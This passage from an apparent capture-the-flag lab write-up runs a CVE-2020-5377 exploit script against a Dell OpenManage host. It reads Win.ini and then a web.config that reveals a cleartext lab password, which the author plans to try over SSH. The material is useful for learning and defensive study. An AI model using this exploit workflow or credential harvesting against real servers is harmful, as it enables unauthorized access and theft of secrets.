Arbitrary File Read
The target OpenManage instance on the HACKSMARTERSEC(10.10.183.209) host is vulnerable to CVE-2020-5377 due to its outdated version; 9.4.0.2.
┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ python3 CVE-2020-5377/CVE-2020-5377.py $tun0 $IP:1311
[-] No server.pem certificate file found. Generating one...
......+.........+...+...........+....+++++++++++++++++++++++++++++++++++++++*.....+..+..........+..+...+............+.......+........+......+....+...+.....+...+....+...+...+++++++++++++++++++++++++++++++++++++++*.....++++++
..+...+..+......+...+.+...+.....+.+......+...+...+..+.+.....+.+......+...............+..+......+++++++++++++++++++++++++++++++++++++++*.....+.+..+...+.........+......+++++++++++++++++++++++++++++++++++++++*.......+...++++++
-----
Session: 5BDE3C5788B4B8F7543499BAF4017C1A
VID: DCC0292B5655D5F3
file > C:\Windows\Win.ini
Reading contents of C:\Windows\Win.ini:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1PoC Confirmed.
web.config
file > C:\inetpub\wwwroot\web.config
Reading contents of C:\inetpub\wwwroot\web.config:
file > C:\inetpub\wwwroot\hacksmartersec\web.config
Reading contents of C:\inetpub\wwwroot\hacksmartersec\web.config:
<configuration>
<appSettings>
<add key="Username" value="tyler" />
<add key="Password" value="IAmA1337h4x0randIkn0wit!" />
</appSettings>
<location path="web.config">
<system.webServer>
<security>
<authorization>
<deny users="*" />
</authorization>
</security>
</system.webServer>
</location>
</configuration>web.config file located at the C:\inetpub\wwwroot\hacksmartersec\ directory.
It contains a CLEARTEXT credential of the tyler user; IAmA1337h4x0randIkn0wit!
Validating against the target SSH server.